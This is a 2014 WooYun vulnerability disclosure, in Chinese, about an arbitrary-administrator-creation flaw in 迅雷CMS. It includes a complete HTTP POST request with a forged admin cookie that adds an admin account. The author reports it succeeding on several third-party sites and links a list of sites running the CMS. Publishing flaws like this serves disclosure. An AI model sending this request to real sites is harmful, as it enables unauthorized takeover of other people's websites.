当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-050504

漏洞标题:迅雷CMS任意添加管理员账号

相关厂商:银川迅雷网络有限公司

漏洞作者: 浅蓝

提交时间:2014-02-10 12:24

修复时间:2014-03-27 12:25

公开时间:2014-03-27 12:25

漏洞类型:设计缺陷/逻辑错误

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-02-10: 积极联系厂商并且等待厂商认领中,细节不对外公开
2014-03-27: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

银川迅雷网络有限公司
官网:www.ycxl.net

详细说明:

UX9$$FHDUCKECQVN1~FIBKW.jpg


先找一个迅雷CMS的后台进入 添加管理员 然后抓包

ZVSHR)@)}7M})3PI41FW05U.jpg


(MAPIPZG%COT2(VDUJ%QS$O.jpg

然后换成另外一个迅雷CMS的网址 点击GO

~1IV58ER$$GFDL8~%C69DFM.jpg

添加成功

DN2G@VD2E8E%IL]WOP1@@KJ.jpg

再换一个

9WD2]B1Y_H[@WXYHG079$`M.jpg

成功添加

VIWDJC8P4W_EM2%@83}[2EK.jpg


2U~N]6@@9[C~$W])_8UY65N.jpg

添加成功

POST /admin/Admin_User.asp?action=savenew HTTP/1.1
Host: ******
User-Agent: Mozilla/5.0 (Windows NT 5.1; rv:24.0) Gecko/20100101 Firefox/24.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://*****/admin/Admin_User.asp?action=add
Cookie: ASPSESSIONIDSSAARRCR=CANNHNEDCDIOIDFLOCNBMCFL; cmsname=admin; cmsid=1
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
username2=账号&password2=密码&Submit=%CC%ED+%BC%D3


http://www.ycxl.net/index.php?m=Article&a=index&id=22 这里的网站都是迅雷CMS的

漏洞证明:

VIWDJC8P4W_EM2%@83}[2EK.jpg


2U~N]6@@9[C~$W])_8UY65N.jpg

添加成功

修复方案:

你们更专业

版权声明:转载请注明来源 浅蓝@乌云


漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝


漏洞评价:

评论

  1. 2014-02-11 22:58 | wefgod ( 普通白帽子 | Rank:1807 漏洞数:179 | 力不从心)

    迅雷………………

  2. 2014-02-17 17:29 | 无常 ( 路人 | Rank:2 漏洞数:2 | 移动互联安全关注者)

    略显蛋疼